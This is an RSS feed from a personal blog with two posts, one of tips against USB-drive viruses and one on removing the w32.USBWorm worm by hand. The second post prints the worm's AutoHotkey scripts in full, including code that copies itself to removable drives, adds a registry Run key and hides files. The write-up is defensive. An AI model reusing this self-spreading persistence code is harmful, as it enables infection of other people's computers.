<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jeba's Blog &#187; Remove USB Virus</title>
	<atom:link href="http://www.jeba.in/posts/tag/remove-usb-virus/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.jeba.in</link>
	<description>Let's talk life!</description>
	<lastBuildDate>Thu, 31 Dec 2009 13:38:47 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>5 Tips to fight Pen/USB Drive Viruses</title>
		<link>http://www.jeba.in/posts/5-tips-to-fight-pen-usb-drive-viruses/</link>
		<comments>http://www.jeba.in/posts/5-tips-to-fight-pen-usb-drive-viruses/#comments</comments>
		<pubDate>Mon, 13 Apr 2009 12:10:09 +0000</pubDate>
		<dc:creator>Allwin Samuel Jeba</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[Tips and tricks]]></category>
		<category><![CDATA[PEN drive viruse]]></category>
		<category><![CDATA[Remove USB Virus]]></category>
		<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[USB virus]]></category>

		<guid isPermaLink="false">http://www.jeba.in/?p=360</guid>
		<description><![CDATA[Pen drives has revolutionized the way we share data. Every now and then one of your friend pops into your house with his pen drive and inserts it into your System to copy what ever he wants and ends up infecting your system with some virus without his/her knowledge. In this post I decided to [...]]]></description>
			<content:encoded><![CDATA[<p>Pen drives has revolutionized the way we share data. Every now and then one of your friend pops into your house with his pen drive and <a href="http://www.jeba.in/posts/w32usbworm-lets-remove-this-worm-manually/" target="_blank">inserts it into your System</a> to copy what ever he wants and ends up infecting your system with some virus without his/her knowledge. In this post I decided to share what precautions that I take to prevent my system getting infected. It requires some effort and patience at the beginning but it will become a habit soon. After all someone told.. precaution is better than cure right ?</p>
<h2>Disable Autorun on All drives :</h2>
<p>All the USB related viruses exploit this feature to spead themselves. Autorun was mainly introduced for removable disks like CD/DVD ROMS so that they automatically run themselves without troubling the user to find the particular file. The root directory of the Drive consists of a file called Autorun.inf that contains the information to run the executable. For eg. Path of the presentation exe etc. We will just disable this feature , which will help us in a great deal to prevent the USB Drive virus.</p>
<p>To disable this feature :</p>
<ul>
<li>Go to Start &gt; Run (windows key + r)</li>
<li>Type gpedit.msc  (This opens the Group Policy)</li>
</ul>
<p style="text-align: center;"><img class="size-full wp-image-361 aligncenter" title="run" src="http://www.jeba.in/wp-content/uploads/2009/04/run.gif" alt="Group Policy - Windows Run" width="347" height="184" /></p>
<ul>
<li>Browse to Administrative Templates &gt; System</li>
</ul>
<p style="text-align: center;"><img class="size-full wp-image-362 aligncenter" title="system" src="http://www.jeba.in/wp-content/uploads/2009/04/system.jpg" alt="system" width="347" height="184" /></p>
<ul>
<li>Double Click on &#8220;Turn Off Autoplay&#8221; for the right side Settings</li>
<li>Select Enable and in the dropdown box select All Drives and click OK.</li>
</ul>
<p><img class="size-full wp-image-363 aligncenter" title="disabled" src="http://www.jeba.in/wp-content/uploads/2009/04/disabled.png" alt="disabled" width="347" height="388" /></p>
<h2>Delete Any Autorun.inf files :</h2>
<p>The first Tip will only disable Virus from spreading itself. There is a good chance that your drive may contain this Autorun.inf file from your previous infection. This file is actually hidden and made readonly so it is not directly visible on your local drive. I personally use a tool called &#8220;Filezilla&#8221; to see the contents of the USB Drive before I access it via Windows Explorer.</p>
<p>Filezilla is basicaly a free FTP Client software that helps you to download or upload files via the FTP protocol. But Filezilla shows all the files in the directory irrespective of it&#8217;s visibility. So I use this feature of Filezilla to look into the USB Drive. If the USB Drive has any autorun.inf file, just right click on the Autorun.inf file and click edit. This will show you the content of the Autorun.inf file. Autorun.inf file is basically a text file. See the path of the exe it points to and delete that exe, com, pf from there.</p>
<p>You can download filezilla from <a href="http://filezilla-project.org/download.php?type=server" target="_blank">here</a>.</p>
<h2>Kill Running process :</h2>
<p>I use another handy tool called <a title="Kills Processes running on memory" href="http://www.softpedia.com/progDownload/Task-Killer-Download-9968.html" target="_blank">Task Killer</a> . This is a small freeware that is very helpful to kill the running Virus Process. You might be asking why I need a tool to kill a process, when I can directly kill the process from Task Manager. Well, yes you can kill any task from the Task Manager but the problem is few of the viruses does not allow the Task manger to be visible. It automatically closes the Task Manager window and thus stopping yourself from identifying it. Task Killer is a small utility that sits on the Task Bar. Just click on it and select the Process you want to kill.</p>
<p><img class="size-full wp-image-364 aligncenter" title="kill-task" src="http://www.jeba.in/wp-content/uploads/2009/04/kill-task.jpg" alt="kill-task" width="606" height="420" /></p>
<p>Make sure you don&#8217;t end up killing any windows task. Make sure you have saved and backed up all your important data before you attempt to do any of these methods which I have mentioned here. Since we are forcing windows settings which can make the OS unstable. Most of the time the virus process name will be exactly same as windows process name, making it a bit harder to identify. But another small tip that can help you is.. all virus process runs under &#8220;Your username&#8221; process. Windows critical processes run under System Process.</p>
<h2>Keep Your Antivirus Updated At All Times :</h2>
<p>This is a pretty obvious tip, but it saves a lot of trouble later. I have seen many of my friends who have disabled the Auto Update feature, I strongly disagree to it. Just enable the damn Auto update and it will take care of the updates. After all Anti viruses are meant to detect virus and save your time from manual removal.</p>
<h2>Use Linux :</h2>
<p>This is probably the weirdest tip but trust me if you<a href="http://www.wikihow.com/Learn-to-Use-Linux" target="_blank"> use Linux</a> you don&#8217;t have to worry about any of the tips mentioned above. Linux has probably the least number of viruses available. To those who have come late, linux has come long way from being a Geeks only OS. Some distro&#8217;s like Mandriva, Linspire,Open  SUSE are customized to be more user friendly. With KDE 4.0 you can be sure you have all the eye candy that can even put Vista to shame.</p>
<p><img class="size-full wp-image-365 aligncenter" title="linux-windows" src="http://www.jeba.in/wp-content/uploads/2009/04/linux-windows.png" alt="linux-windows" width="399" height="216" /></p>
<p>I hope you would have found these tips useful. Do let me know how did these tips helped you. Feel free to share your tips too.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.jeba.in/posts/5-tips-to-fight-pen-usb-drive-viruses/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>w32.USBWorm lets remove this worm manually</title>
		<link>http://www.jeba.in/posts/w32usbworm-lets-remove-this-worm-manually/</link>
		<comments>http://www.jeba.in/posts/w32usbworm-lets-remove-this-worm-manually/#comments</comments>
		<pubDate>Wed, 16 May 2007 17:16:57 +0000</pubDate>
		<dc:creator>Allwin Samuel Jeba</dc:creator>
				<category><![CDATA[Personal]]></category>
		<category><![CDATA[Remove USB Virus]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://www.jeba.in/posts/w32usbworm-lets-remove-this-worm-manually/</guid>
		<description><![CDATA[Yesterday, my friend Vinay gave me a usb disk and asked me to copy some movies and music into the disk. I took it home and plugged the USB into my system and scanned it with nod32. I detected some viruses which it removed successfully, least I knew that there was another worm which didn&#8217;t [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center">
<p>Yesterday, my friend Vinay gave me a usb disk and asked me to copy some movies and music into the disk. I took it home and plugged the USB into my system and scanned it with nod32. I detected some viruses which it removed successfully, least I knew that there was another worm which didn&#8217;t get detected and it was in to infect my system. I double clicked the USB drive and nothing happened. Hmm strange.. I right clicked and opened the USB drive and found there was no content. Autoplay appears only if there is a Autorun.inf file present in the root of the drive. I didn&#8217;t care it much and closed the window to copy data into the drive later.<img src="http://www.jeba.in/wp-content/uploads/2007/07/worm.gif" alt="orkut youtube worm" /><br />
I wanted to check my mail so ran my beloved browser Firefox, it opened and with in couple of seconds a message box popped up which said &#8221; &#8220;I DNT HATE MOZILLA BUT USE IE OR ELSE&#8230;&#8221; and the header read &#8220;USE INTERNET EXPLORER YOU DOPE.&#8221; I was like what? It also terminated Firefox <img src='http://www.jeba.in/wp-includes/images/smilies/icon_sad.gif' alt=':-(' class='wp-smiley' />  . This is when I remembered the Autoplay option in the usb drive. This is when I had to open Internet Explorer and Google this text and found the worm name is  w32.USBWorm (it was now obvious). Next step was to search for a Removal Tool and to my amazement there was none available!! Nor I could find any information on how to remove it. I decided to give myself a try to remove this worm. I tried opening orkut and Bang another surprise. This is the message it popped up &#8221; ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? &#8221; now this is pissing me off. Now, i had no other option but to remove this worm from my system. I pressed ctrl+alt+del and found nothing suspesious there .<span id="more-120"></span></p>
<p><strong>Lets see what this worm does</strong></p>
<p>It runs a exe file which is name MicrosoftPowerpoint.exe which is located in the USB disk. The autorun.inf runs this file when double clicked. Once this program is run you are infected. It hides all your hidden folders, runs the process in the memory, makes the worm to start with windows and pops those annoying messages. This worm doesn&#8217;t destroy any system files. It just infects other USB drives and spreads to new hosts.</p>
<p><strong>It&#8217;s time to KO the Worm</strong></p>
<p>I have PE Tools installed in my PC i ran to find out the running process. I went through all the process and found out that svchost.exe was the one responsible for it. Where PE tools helped me was, svchost.exe was running from a location C:\heap41a . So this is where the worm resides, hmm interesting now deleting the folder would do our task. But it was not so easy, as I terminated this process svchost.exe from the process list it would start again. So I had to boot my XP in safe mode. Why in safe mode is because in safe mode windows loads only the minimum required drivers and doesn&#8217;t load any user process, so this means the worm is not started with the windows. Now I searched the folder C:\heap41b but it was hidden. I went to Tools&gt;folder option and select Show all files and folders and pressed ok. I refreshed the c:\ only to find that it won&#8217;t show any hidden folders. I again went to the Tools&gt;folder and found the setting of Show all files and folders was reseted. Now how do I see the content, what I did was went to windows search and in advanced option I gave search hidden files and folders and gave svchost.exe as the search keyword. Bang it searched it, so I opened the folder to find out this file was not alone, the other files in this Folder were [offspring], 2.mp3, Icon.ico, reproduce.txt, svchost.exe, drivelist.txt, script1.txt, std.txt .  Lets see the content of these text files.</p>
<p>[offspring] &#8211; Blank Folder</p>
<p>2.mp3 &#8211; A laughing sound</p>
<p>Icon.ico &#8211; A blank Icon file</p>
<p><strong>reproduce.txt </strong></p>
<blockquote><p>#notrayicon<br />
#persistent<br />
ArrayCount = 0<br />
Loop, Read,C:\heap41a\driveList.txt<br />
{<br />
ArrayCount += 1<br />
Array%ArrayCount% := A_LoopReadLine<br />
}<br />
dat1=%userprofile%<br />
settimer,reproduce,5000<br />
return</p>
<p>reproduce:</p>
<p>Loop %ArrayCount%<br />
{</p>
<p>element := Array%A_Index%<br />
driveget,data,Type,%element%:\<br />
ifequal,data,Removable<br />
{<br />
driveget,data1,status,%element%:\<br />
ifequal,data1,Ready<br />
{<br />
FileCopydir,C:\heap41a\offspring,%element%:\,1</p>
<p>}</p>
<p>}<br />
}<br />
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\</p>
<p>CurrentVersion\policies\Explorer\Run,winlogon<br />
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt<br />
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\</p>
<p>CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt<br />
return</p></blockquote>
<p><strong> svchost.exe</strong></p>
<p>This is the file that is the culprit. The file responsible for all the annoying pop ups</p>
<p><strong> script1.txt</strong></p>
<blockquote><p>#persistent<br />
#notrayicon<br />
settimer,ban,2000<br />
return</p>
<p>ban:<br />
WinGetActiveTitle, ed<br />
ifinstring,ed,orkut<br />
{<br />
winclose %ed%<br />
soundplay,C:\heap41a\2.mp3<br />
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30<br />
return<br />
}<br />
ifinstring,ed,youtube<br />
{<br />
winclose %ed%<br />
soundplay,C:\heap41a\2.mp3<br />
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30<br />
return<br />
}<br />
ifinstring,ed,Mozilla Firefox<br />
{<br />
winclose %ed%<br />
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r        OR ELSE&#8230;,30<br />
return<br />
}<br />
ifwinactive ahk_class IEFrame<br />
{</p>
<p>ControlGetText,ed,edit1,ahk_class IEFrame<br />
ifinstring,ed,orkut<br />
{<br />
winclose ahk_class IEFrame<br />
soundplay,C:\heap41a\2.mp3<br />
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30<br />
return<br />
}<br />
ControlGetText,ed,edit2,ahk_class IEFrame<br />
ifinstring,ed,orkut<br />
{<br />
winclose ahk_class IEFrame<br />
soundplay,C:\heap41a\2.mp3<br />
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30<br />
return<br />
}<br />
ControlGetText,ed,edit3,ahk_class IEFrame<br />
ifinstring,ed,orkut<br />
{<br />
winclose ahk_class IEFrame<br />
soundplay,C:\heap41a\2.mp3<br />
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30<br />
return<br />
}<br />
ControlGetText,ed,edit4,ahk_class IEFrame<br />
ifinstring,ed,orkut<br />
{<br />
winclose ahk_class IEFrame<br />
soundplay,C:\heap41a\2.mp3<br />
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30<br />
return<br />
}<br />
ControlGetText,ed,edit1,ahk_class IEFrame<br />
ifinstring,ed,youtube<br />
{<br />
winclose ahk_class IEFrame<br />
soundplay,C:\heap41a\2.mp3<br />
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30<br />
return<br />
}<br />
ControlGetText,ed,edit2,ahk_class IEFrame<br />
ifinstring,ed,youtube<br />
{<br />
winclose ahk_class IEFrame<br />
soundplay,C:\heap41a\2.mp3<br />
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30<br />
return<br />
}<br />
ControlGetText,ed,edit3,ahk_class IEFrame<br />
ifinstring,ed,youtube<br />
{<br />
winclose ahk_class IEFrame<br />
soundplay,C:\heap41a\2.mp3<br />
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30<br />
return<br />
}<br />
ControlGetText,ed,edit4,ahk_class IEFrame<br />
ifinstring,ed,youtube<br />
{<br />
winclose ahk_class IEFrame<br />
soundplay,C:\heap41a\2.mp3<br />
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r                                               MUHAHAHA!!,30<br />
return<br />
}</p>
<p>}<br />
return</p></blockquote>
<p><strong>std.txt</strong></p>
<blockquote><p>#notrayicon<br />
#singleinstance,ignore<br />
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\</p>
<p>CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue<br />
ifnotequal,regdata,2<br />
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\</p>
<p>CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2<br />
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt<br />
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt</p></blockquote>
<p>These files gave away all that this worm does, after reading the script I found out that this worm also hates Youtube lol.. Most important information it gave was the Registery Keys it modified.</p>
<p>These are the keys that were responsible for the hidden folder problem I faced earlier</p>
<blockquote><p>regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\</p>
<p>CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue<br />
ifnotequal,regdata,2<br />
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\</p>
<p>Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2</p></blockquote>
<p>Now to rectify this go to Start Menu&gt;Run and type regedit . In the Registry Editor browse to this entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\</p>
<p>CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and in the &#8220;Checked all&#8221; key reset it back to 1 from 2. Now you can change the settings in the folders option. Now delete the folder C:\heap41a and clear all the key entries from this registry entry HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\</p>
<p>CurrentVersion\policies\Explorer\Run which says heap41a.</p>
<p>Now the virus infection is removed 100%. Before you are done make sure you format the usb drive it doesn&#8217;t infect other systems too.</p>
<p>All the best. Untill a tool is out for this worm, you can follow this method to remove w32.USBWorm.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.jeba.in/posts/w32usbworm-lets-remove-this-worm-manually/feed/</wfw:commentRss>
		<slash:comments>143</slash:comments>
		</item>
	</channel>
</rss>
